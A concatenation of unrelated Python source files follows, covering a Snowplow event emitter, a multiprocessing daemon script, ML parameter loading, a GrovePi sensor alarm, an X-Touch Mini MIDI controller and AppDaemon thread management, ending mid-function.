:param payload: The name-value pairs for the event
:type payload: dict(string:*)
"""
if self.method == "post":
self.buffer.append({key: str(payload[key]) for key in payload})
else:
self.buffer.append(payload)
if len(self.buffer) >= self.buffer_size:
self.flush()
@task(name="Flush")
def flush(self):
"""
Sends all events in the buffer to the collector.
"""
logger.info("Attempting to send %s requests" % len(self.buffer))
if self.method == "post":
if self.buffer:
data = json.dumps({
"schema": PAYLOAD_DATA_SCHEMA,
"data": self.buffer
}, separators=(',', ':'))
temp_buffer = self.buffer
self.buffer = []
status_code = self.http_post(data).status_code
if status_code == 200 and self.on_success is not None:
self.on_success(len(temp_buffer))
elif self.on_failure is not None:
self.on_failure(0, temp_buffer)
elif self.method == "get":
success_count = 0
unsent_requests = []
status_code = None
while len(self.buffer) > 0:
payload = self.buffer.pop()
status_code = self.http_get(payload).status_code
if status_code == 200:
success_count += 1
else:
unsent_requests.append(payload)
if len(unsent_requests) == 0:
if self.on_success is not None:
self.on_success(success_count)
elif self.on_failure is not None:
self.on_failure(success_count, unsent_requests)
else:
logger.warn(self.method + ' is not a recognised HTTP method. Use "get" or "post".')
@contract
def http_post(self, data):
"""
:param data: The array of JSONs to be sent
:type data: string
"""
logger.info("Sending POST request to %s..." % self.endpoint)
logger.debug("Payload: %s" % data)
r = requests.post(self.endpoint, data=data, headers={'content-type': 'application/json; charset=utf-8'})
getattr(logger, "info" if r.status_code == 200 else "warn")("POST request finished with status code: " + str(r.status_code))
return r
@contract
def http_get(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.info("Sending GET request to %s..." % self.endpoint)
logger.debug("Payload: %s" % payload)
r = requests.get(self.endpoint, params=payload)
getattr(logger, "info" if r.status_code == 200 else "warn")("GET request finished with status code: " + str(r.status_code))
return r
def sync_flush(self):
"""
Calls the flush method of the base Emitter class.
This is guaranteed to be blocking, not asynchronous.
"""
logger.debug("Starting synchronous flush...")
result = Emitter.flush(self)
for t in self.threads:
t.join(THREAD_TIMEOUT)
logger.info("Finished synchrous flush")
class AsyncEmitter(Emitter):
"""
Uses threads to send HTTP requests asynchronously
"""
def flush(self):
"""
Removes all dead threads, then creates a new thread which
excecutes the flush method of the base Emitter class
"""
self.threads = [t for t in self.threads if t.isAlive()]
logger.debug("Flushing thread running...")
t = threading.Thread(target=super(AsyncEmitter, self).flush)
self.threads.append(t)
t.start()
class CeleryEmitter(Emitter):
"""
Uses a Celery worker to send HTTP requests asynchronously.
Works like the base Emitter class,
but on_success and on_failure callbacks cannot be set.
"""
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None):
super(CeleryEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, None, None)
def flush(self):
"""
Schedules a flush task
"""
super(CeleryEmitter, self).flush.delay()
logger.info("Scheduled a Celery task to flush the event queue")
class RedisEmitter(object):
"""
Sends Snowplow events to a Redis database
"""
@contract
def __init__(self, rdb=None, key="snowplow"):
"""
:param rdb: Optional custom Redis database
:type rdb: redis | None
:param key: The Redis key for the list of events
:type key: string
"""
if rdb is None:
rdb = redis.StrictRedis()
self.rdb = rdb
self.key = key
@contract
def input(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.debug("Pushing event to Redis queue...")
self.rdb.rpush(self.key, json.dumps(payload))
logger.info("Finished sending event to Redis.")
def flush(self):
logger.warn("The RedisEmitter class does not need to be flushed")
def sync_flush(self):
self.flush()
|
start.py | import multiprocessing
import os
import signal
import sys
import time
import RuntimeError
reload(sys)
# sys.setdefaultencoding("UTF-8")
base_dir = os.path.split(os.path.abspath(sys.argv[0]))[0]
class GracefulExitEvent(object):
def __init__(self):
self.workers = []
self.exit_event = multiprocessing.Event()
# Use signal handler to throw exception which can be caught
# by worker process to allow graceful exit.
signal.signal(signal.SIGTERM, RuntimeError.AppExitException.sigterm_handler)
pass
def reg_worker(self, wp):
self.workers.append(wp)
pass
def is_stop(self):
return self.exit_event.is_set()
def notify_stop(self):
self.exit_event.set()
def wait_all(self):
while True:
try:
for wp in self.workers:
wp.join()
print "main process(%d) exit." % os.getpid()
break
except RuntimeError.AppExitException:
self.notify_stop()
print "main process(%d) got GracefulExitException." % os.getpid()
except Exception, ex:
self.notify_stop()
print "main process(%d) got unexpected Exception: %r" % (os.getpid(), ex)
break
pass
def worker_proc(gee):
import sys, time
print "worker(%d) start ..." % os.getpid()
try:
while not gee.is_stop():
# do task job here
print ".",
gee.wait(1)
else:
print ""
print "worker process(%d) got exit event." % os.getpid()
print "worker process(%d) do cleanup..." % os.getpid()
time.sleep(1)
print "[%d] 3" % os.getpid()
time.sleep(1)
print "[%d] 2" % os.getpid()
time.sleep(1)
print "[%d] 1" % os.getpid()
except RuntimeError.AppExitException:
print "worker(%d) got GracefulExitException" % os.getpid()
except Exception, ex:
print "Exception:", ex
finally:
print "worker(%d) exit." % os.getpid()
sys.exit(0)
def daemonize(stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
os.chdir("/")
os.umask(0)
os.setsid()
for f in sys.stdout, sys.stderr: f.flush()
si = open(stdin, 'r')
so = open(stdout, 'a+')
se = open(stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
if __name__ == '__main__':
log_path = base_dir + '/log/'
if not os.path.isdir(log_path):
os.makedirs(log_path)
run_path = base_dir + '/Run_Log/'
if not os.path.isdir(run_path):
os.makedirs(run_path)
# daemonize('/dev/null', log_path + 'trace.log', log_path + 'error.log')
# signal.signal(signal.SIGTERM, stop)
import sys
print "main process(%d) start" % os.getpid()
gee = GracefulExitEvent()
# Start some workers process and run forever
for i in range(0, 10):
wp = multiprocessing.Process(target=worker_proc, args=(gee,))
wp.start()
gee.reg_worker(wp)
gee.wait_all()
sys.exit(0)
|
Params_Winslow.py | # @sp: newly created
import sys
import os
import threading
import time
from datetime import datetime
from polyaxon_client.tracking import Experiment
from params import param_utils
import params.polyaxon_parsing as pp
from util.output_artifact_utils import define_prepare_mdl_path, \
define_prepare_tb_path
def get_file_inputs():
while True:
try:
sys.argv.append(input())
except EOFError:
break
class Params:
"""
Description
----
This enables the code to use winslow. Most of this is copied from Params (for Polyaxon).
"""
# This is to load the params from a file
input_thread = threading.Thread(target=get_file_inputs, args=(), daemon=True)
input_thread.start()
print("Fetching inputs", end=" ... -> ")
time.sleep(10)
print("done.")
temporal_context = 0
last_interval = None
# polyaxon params
experiment = Experiment()
plx = pp.get_parameters()
param_utils.set_params(plx)
param_utils.check_params(plx)
# if the environment is within winslow
if 'WINSLOW_PIPELINE_NAME' in os.environ:
# output paths
log_dir_mdl = "/workspace/mdl_chkpts/"
if not os.path.exists(log_dir_mdl):
os.mkdir(log_dir_mdl)
print("Directory ", log_dir_mdl, " Created ")
else:
print("Directory ", log_dir_mdl, " already exists")
file_path_mdl = "/workspace/mdl_chkpts/" + plx.get('mdl_architecture') + '_' + plx.get('eng_kind') + ".hdf5"
logdir_tb = "/workspace/tf_logs/scalars" + datetime.now().strftime("%Y%m%d-%H%M%S")
file_path_raw_mdl = "/workspace/mdl_chkpts/" + plx.get('mdl_architecture') + '_' + 'untrained' + ".hdf5"
else:
# output paths
file_path_mdl, file_path_raw_mdl = define_prepare_mdl_path(plx)
logdir_tb = define_prepare_tb_path()
def winslow_params(params, transferlearning=False):
"""
If running on winslow, adjust the parameters according to winslow settings
:param transferlearning:
:param params:
"""
if transferlearning == True:
params.plx['tl_stage'] = os.environ['tl_stage']
params.plx['tl_mode'] = os.environ['tl_mode']
else:
params.plx['k_crossval'] = int(os.environ['k_crossval'])
params.plx['load_model'] = bool(int(os.environ['load_model']))
params.plx['apply_oversampling'] = bool(int(os.environ['apply_oversampling']))
params.plx['epochs'] = int(os.environ['epochs'])
params.plx['batch_size'] = int(os.environ['batch_size'])
params.plx['train_count'] = int(os.environ['train_count'])
params.plx['val_count'] = int(os.environ['val_count'])
params.plx['test_count'] = int(os.environ['test_count'])
params.plx['l_epochs'] = int(os.environ['l_epochs'])
params.plx['l_subepochs'] = int(os.environ['l_subepochs'])
params.plx['l_overlapping'] = int(os.environ['l_overlapping'])
params.plx['filtersize'] = int(os.environ['filtersize'])
params.plx['lr'] = float(os.environ['o_learning_rate'])
params.plx['beta1'] = float(os.environ['o_beta1'])
params.plx['beta2'] = float(os.environ['o_beta2'])
params.plx['epsilon'] = float(os.environ['o_epsilon'])
params.plx['l_regularization_factor'] = float(os.environ['l_regularization_factor'])
|
Trigger.py | import grovepi
import time
from threading import Thread
# Connect the Grove PIR Motion Sensor to digital port D8
# SIG,NC,VCC,GND
pir_sensor = 8
grovepi.pinMode(pir_sensor,"INPUT")
# Connect the Grove Piezo Vibration Sensor to analog port A0
# OUT,NC,VCC,GND
piezo = 0
grovepi.pinMode(piezo,"INPUT")
class Trigger():
def __init__(self, db):
super().__init__()
trigger_ref = db.collection(u'Users').document('y2wiAwN8e1e52SWtvVD3BNFiWGu2').collection('People').document('Indy').collection('Sensors').document('alarmCheck')
#checkVibrate = Thread(target = Vibrationsensor)
#checkMotion = Thread(target = Motionsensor)
#print(checkMotion.getStatus)
#checkVibrate.start()
#checkMotion.start()
try:
if grovepi.digitalRead(pir_sensor):
print('Motion Detected')
if grovepi.analogRead(piezo) > 100:
print('Vibration detected')
trigger_ref.update({
u'alarm': True,
})
else:
print('No vibration')
else:
print('Nothing detected')
time.sleep(.5)
except IOError:
print("Error with trigger")
|
midicontroller.py | "See MidiController docstring"
# part of xair-remote.py
# Copyright (c) 2018, 2021 Peter Dikant
# Additions Copyright (c) 2021 Ross Dickson
# Some rights reserved. See LICENSE.
import threading
import time
import os
from mido import Message, open_input, open_output, get_input_names, get_output_names
class TempoDetector:
"""
Detect song tempo via a tap button
"""
_MAX_TAP_DURATION = 3.0
current_tempo = 0.5
number = -1
def __init__(self, state):
self.state = state
self.midi_controller = state.midi_controller
self.last_tap = 0
self.tap_num = 0
self.tap_delta = 0
worker = threading.Thread(target = self.blink)
worker.daemon = True
worker.start()
def tap(self):
current_time = time.time()
if current_time - self.last_tap > self._MAX_TAP_DURATION:
# Start with new tap cycle
self.tap_num = 0
self.tap_delta = 0
else:
self.tap_num += 1
self.tap_delta += current_time - self.last_tap
if self.tap_num > 0:
# Update tempo in mixer after at least 2 taps
self.state.update_tempo(self.tap_delta / self.tap_num)
self.current_tempo = self.tap_delta / self.tap_num
self.last_tap = current_time
def blink(self):
try:
while self.state is not None and self.state.quit_called != True:
if self.number != -1:
self.midi_controller.set_channel_mute(self.number, "On")
time.sleep(self.current_tempo * 0.2)
self.midi_controller.set_channel_mute(self.number, "Off")
time.sleep(self.current_tempo * 0.8)
except KeyboardInterrupt:
if self.state is not None:
self.state.shutdown()
exit()
class MidiController:
"""
Handles communication with the MIDI surface.
X-Touch Mini must be in MC mode!
Fader 1-8: CC16 - CC23, Note 32 - 39 on push
Turn right: Values 1 - 10 (Increment)
Turn left: Values 65 - 72 (Decrement)
Buttons 1-8: Note 89, 90, 40, 41, 42, 43, 44, 45
Buttons 9-16: Note 87, 88, 91, 92, 86, 93, 94, 95
Buttons LA/LB (aka 17/18): Note 84/85
Master Fader: Pitch Wheel
"""
MC_CHANNEL = 0
MIDI_BUTTONS = [89, 90, 40, 41, 42, 43, 44, 45, 87, 88, 91, 92, 86, 93, 94, 95, 84, 85]
MIDI_PUSH = [32, 33, 34, 35, 36, 37, 38, 39]
MIDI_ENCODER = [16, 17, 18, 19, 20, 21, 22, 23]
MIDI_RING = [48, 49, 50, 51, 52, 53, 54, 55]
LED_OFF = 0
LED_BLINK = 1
LED_ON = 127
active_layer = 0
inport = None
outport = None
def __init__(self, state):
self.state = state
for name in get_input_names():
if "x-touch mini" in name.lower():
print('Using MIDI input: ' + name)
try:
self.inport = open_input(name)
except IOError:
print('Error: Can not open MIDI input port ' + name)
self.state.quit_called = True
self.state = None
return
break
for name in get_output_names():
if "x-touch mini" in name.lower():
print('Using MIDI output: ' + name)
try:
self.outport = open_output(name)
except IOError:
print('Error: Can not open MIDI input port ' + name)
self.state.quit_called = True
self.state = None
return
break
if self.inport is None or self.outport is None:
print('X-Touch Mini not found. Make sure device is connected!')
self.state.quit_called = True
self.cleanup_controller()
return
for i in range(0, 18):
self.set_button(i, self.LED_OFF) # clear all buttons
worker = threading.Thread(target=self.midi_listener)
worker.daemon = True
worker.start()
if self.state.monitor:
print('Monitoring X-Touch connection enabled')
monitor = threading.Thread(target=self.monitor_ports)
monitor.daemon = True
monitor.start()
def cleanup_controller(self):
"Cleanup mixer state if we see a quit call. Called from _init_ or worker thread."
for i in range(0, 18):
self.set_button(i, self.LED_OFF) # clear all buttons
for i in range(0,8):
self.set_ring(i,-1)
if self.inport is not None:
self.inport.close()
if self.outport is not None:
self.outport.close()
def monitor_ports(self):
"Method to exit if / when the X Touch disconnects"
try:
while not self.state.quit_called:
if self.inport.name not in get_input_names():
print("X-Touch disconnected - Exiting")
#os._exit(1)
self.state.quit_called = True
return
if self.state.quit_called:
return # end the thread if other threads have signed exit
time.sleep(1)
except KeyboardInterrupt:
if self.state is not None:
self.state.shutdown()
else:
self.cleanup_controller()
exit()
def midi_listener(self):
"Listen to midit inputs and respond."
try:
for msg in self.inport:
if self.state is None or self.state.quit_called:
self.cleanup_controller()
return
#print('Received {}'.format(msg))
if msg.type == 'control_change':
if msg.control in self.MIDI_ENCODER:
delta = msg.value
if delta > 64:
delta = (delta - 64) * -1
encoder_num = self.MIDI_ENCODER.index(msg.control)
LED = self.state.encoder_turn(encoder_num, delta)
self.set_ring(encoder_num, LED)
else:
print('Received unknown {}'.format(msg))
elif msg.type == 'note_on' and msg.velocity == 127:
if self.state.debug:
print('Note {} pushed'.format(msg.note))
if msg.note in self.MIDI_PUSH:
encoder_num = self.MIDI_PUSH.index(msg.note)
LED = self.state.encoder_press(encoder_num)
self.set_ring(encoder_num, LED)
elif msg.note in self.MIDI_BUTTONS:
button_num = self.MIDI_BUTTONS.index(msg.note)
LED = self.state.button_press(button_num)
self.set_channel_mute(button_num, LED)
else:
print('Received unknown {}'.format(msg))
elif msg.type == 'pitchwheel':
self.state.fader_move(msg)
elif msg.type != 'note_off' and msg.type != 'note_on':
print('Received unknown {}'.format(msg))
if self.state.quit_called:
self.state.shutdown()
return
except KeyboardInterrupt:
if self.state is not None:
self.state.shutdown()
else:
self.cleanup_controller()
exit()
def activate_bus(self):
"refresh the lights for the current layer"
# reset lights
for i in range(0, 8):
self.set_ring(i, self.state.get_encoder(i))
self.set_channel_mute(i, self.state.get_button(i))
for i in range(8, 18):
self.set_channel_mute(i, self.state.get_button(i))
def set_channel_mute(self, channel, LED):
"Send the mute value to the button"
if LED == "On" or LED == 0: # LED is sense Negative for mute
self.set_button(channel, self.LED_ON)
elif LED == "Off" or LED == 1: # LED is sense Negative for mute
self.set_button(channel, self.LED_OFF)
elif LED == "none":
return
else:
self.set_button(channel, self.LED_BLINK)
def set_ring(self, ring, value):
"Send the fader value to the encoder ring"
"Turn on the appropriate LEDs on the encoder ring."
# 0 = off, 1-11 = single, 17-27 = pan, 33-43 = fan, 49-54 = spread
# normalize value (0.0 - 1.0) to 0 - 11 range
# values below 0 mean disabled
if value >= 0.0:
self.outport.send(Message('control_change', channel=self.MC_CHANNEL,
control=self.MIDI_RING[ring],
value=self.map_lights(value)))
# value=33 + round(value * 11)))
else:
self.outport.send(Message('control_change', channel=self.MC_CHANNEL,
control=self.MIDI_RING[ring],
value=0))
def map_lights(self, value):
"map the (0:1) range of fader values to ring light patterns"
# for faders -oo to -10.2db map to single lights while -10 to +10 map to the fan
value = 1 + round(value * 21)
if value > 11:
value = value + 22
return value
def set_button(self, button, ch_on):
"Turn the button LED on or off"
self.outport.send(Message('note_on', channel=self.MC_CHANNEL,
note=self.MIDI_BUTTONS[button], velocity=ch_on))
|
threading.py | import asyncio
import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
import functools
import iso8601
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
def __init__(self, ad: AppDaemon, kwargs):
self.AD = ad
self.kwargs = kwargs
self.logger = ad.logging.get_child("_threading")
self.diag = ad.logging.get_diag()
self.thread_count = 0
self.threads = {}
# A few shortcuts
self.add_entity = ad.state.add_entity
self.get_state = ad.state.get_state
self.set_state = ad.state.set_state
self.add_to_state = ad.state.add_to_state
self.add_to_attr = ad.state.add_to_attr
self.auto_pin = True
self.pin_threads = 0
self.total_threads = 0
# Setup stats
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
self.callback_list = []
async def get_q_update(self):
for thread in self.threads:
qsize = self.get_q(thread).qsize()
await self.set_state("_threading", "admin", "thread.{}".format(thread), q=qsize)
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{
"fired": self.current_callbacks_fired,
"executed": self.current_callbacks_executed,
"ts": now
})
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (self.callback_list[len(self.callback_list) -1]["ts"] - self.callback_list[0]["ts"]).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state("_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
await self.add_entity("admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
async def create_initial_threads(self):
kwargs = self.kwargs
if "threads" in kwargs:
self.logger.warning(
"Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps")
if "total_threads" in kwargs:
self.total_threads = kwargs["total_threads"]
self.auto_pin = False
else:
apps = await self.AD.app_management.check_config(True, False)
self.total_threads = int(apps["active"])
self.pin_apps = True
utils.process_arg(self, "pin_apps", kwargs)
if self.pin_apps is True:
self.pin_threads = self.total_threads
else:
self.auto_pin = False
self.pin_threads = 0
if "total_threads" not in kwargs:
self.total_threads = 10
utils.process_arg(self, "pin_threads", kwargs, int=True)
if self.pin_threads > self.total_threads:
raise ValueError("pin_threads cannot be > total_threads")
if self.pin_threads < 0:
raise ValueError("pin_threads cannot be < 0")
self.logger.info("Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads)
self.next_thread = self.pin_threads
self.thread_count = 0
for i in range(self.total_threads):
await self.add_thread(True)
# Add thread object to track async
await self.add_entity("admin", "thread.async", "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
"pinned_apps": []
}
)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
return [self.atoi(c) for c in re.split('(\d+)', text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
async def dump_threads(self):
self.diag.info("--------------------------------------------------")
self.diag.info("Threads")
self.diag.info("--------------------------------------------------")
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
self.diag.info("Currently busy threads: %s", current_busy)
self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
self.diag.info("Last activity: %s", last_action_time)
self.diag.info("Total Q Entries: %s", self.total_q_size())
self.diag.info("--------------------------------------------------")
for thread in sorted(self.threads, key=self.natural_keys):
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
print("thread.{}".format(thread), t)
self.diag.info(
"%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
thread,
t["attributes"]["q"],
t["state"],
t["attributes"]["time_called"],
t["attributes"]["is_alive"],
await self.get_pinned_apps(thread)
)
self.diag.info("--------------------------------------------------")
#
# Thread Management
#
def select_q(self, args):
#
# Select Q based on distribution method:
# Round Robin
# Random
# Load distribution
#
# Check for pinned app and if so figure correct thread for app
if args["pin_app"] is True:
thread = args["pin_thread"]
# Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
# If this happens a lot, thread 0 might get congested but the alternatives are worse!
if thread == -1:
self.logger.warning("Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"])
thread = 0
else:
if self.thread_count == self.pin_threads:
raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
if self.AD.load_distribution == "load":
thread = self.min_q_id()
elif self.AD.load_distribution == "random":
thread = randint(self.pin_threads, self.thread_count - 1)
else:
# Round Robin is the catch all
thread = self.next_thread
self.next_thread += 1
if self.next_thread == self.thread_count:
self.next_thread = self.pin_threads
if thread < 0 or thread >= self.thread_count:
raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
id = "thread-{}".format(thread)
q = self.threads[id]["queue"]
q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].isAlive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id=thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
dur = (await self.AD.sched.get_now() - start).total_seconds()
if dur >= self.AD.thread_duration_warning_threshold and dur % self.AD.thread_duration_warning_threshold == 0:
self.logger.warning("Excessive time spent in callback: %s - %s",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="callback")
, dur)
async def check_q_size(self, warning_step, warning_iterations):
totalqsize = 0
for thread in self.threads:
totalqsize += self.threads[thread]["queue"].qsize()
if totalqsize > self.AD.qsize_warning_threshold:
if (warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations) or warning_iterations == self.AD.qsize_warning_iterations:
for thread in self.threads:
qsize = self.threads[thread]["queue"].qsize()
if qsize > 0:
self.logger.warning("Queue size for thread %s is %s, callback is '%s' called at %s - possible thread starvation",
thread, qsize,
await self.get_state("_threading", "admin", "thread.{}".format(thread)),
iso8601.parse_date(await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="time_called"))
)
await self.dump_threads()
warning_step = 0
warning_step += 1
warning_iterations += 1
if warning_step >= self.AD.qsize_warning_step:
warning_step = 0
else:
warning_step = 0
warning_iterations = 0
return warning_step, warning_iterations
async def update_thread_info(self, thread_id, callback, app, type, uuid):
self.logger.debug("Update thread info: %s", thread_id)
if self.AD.log_thread_actions:
if callback == "idle":
self.diag.info(
"%s done", thread_id)
else:
self.diag.info(
"%s calling %s callback %s", thread_id, type, callback)
now = await self.AD.sched.get_now()
if callback == "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
if self.AD.sched.realtime is True and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold:
self.logger.warning("callback %s has now completed", await self.get_state("_threading", "admin", "thread.{}".format(thread_id)))
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1)
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
self.current_callbacks_executed += 1
else:
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
self.current_callbacks_fired += 1
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
if current_busy > max_busy:
await self.set_state("_threading", "admin", "sensor.threads_max_busy" , state=current_busy)
await self.set_state("_threading", "admin", "sensor.threads_max_busy_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
await self.set_state("_threading", "admin", "sensor.threads_last_action_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
# Update thread info
if thread_id == "async":
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=0,
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=True,
pinned_apps=[]
)
else:
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=self.threads[thread_id]["queue"].qsize(),
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=self.threads[thread_id]["thread"].is_alive(),
pinned_apps=await self.get_pinned_apps(thread_id)
)
await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity("admin", "thread.{}".format(name), "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
}
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state("_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True)
self.threads[name]["thread"] = t
async def calculate_pin_threads(self):
if self.pin_threads == 0:
return
thread_pins = [0] * self.pin_threads
for name in self.AD.app_management.objects:
# Looking for apps that already have a thread pin value
if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
thread = await self.get_pin_thread(name)
if thread >= self.thread_count:
raise ValueError("Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'")
# Ignore anything outside the pin range as it will have been set by the user
if thread < self.pin_threads:
thread_pins[thread] += 1
# Now we know the numbers, go fill in the gaps
for name in self.AD.app_management.objects:
if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
thread = thread_pins.index(min(thread_pins))
await self.set_pin_thread(name, thread)
thread_pins[thread] += 1
for thread in self.threads:
pinned_apps = await self.get_pinned_apps(thread)
await self.set_state("_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
valid = True
if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning("Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name)
valid = False
return valid
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
async def check_days_constraint(self, args, name):
unconstrained = True
if "constrain_days" in args:
days = args["constrain_days"]
now = await self.AD.sched.get_now()
daylist = []
for day in days.split(","):
daylist.append(await utils.run_in_executor(self, utils.day_of_week, day))
if now.weekday() not in daylist:
unconstrained = False
return unconstrained
#
# Workers
#
async def check_and_dispatch_state(self, name, funcref, entity, attribute, new_state,
old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread):
executed = False
#kwargs["handle"] = uuid_
#
#
#
if attribute == "all":
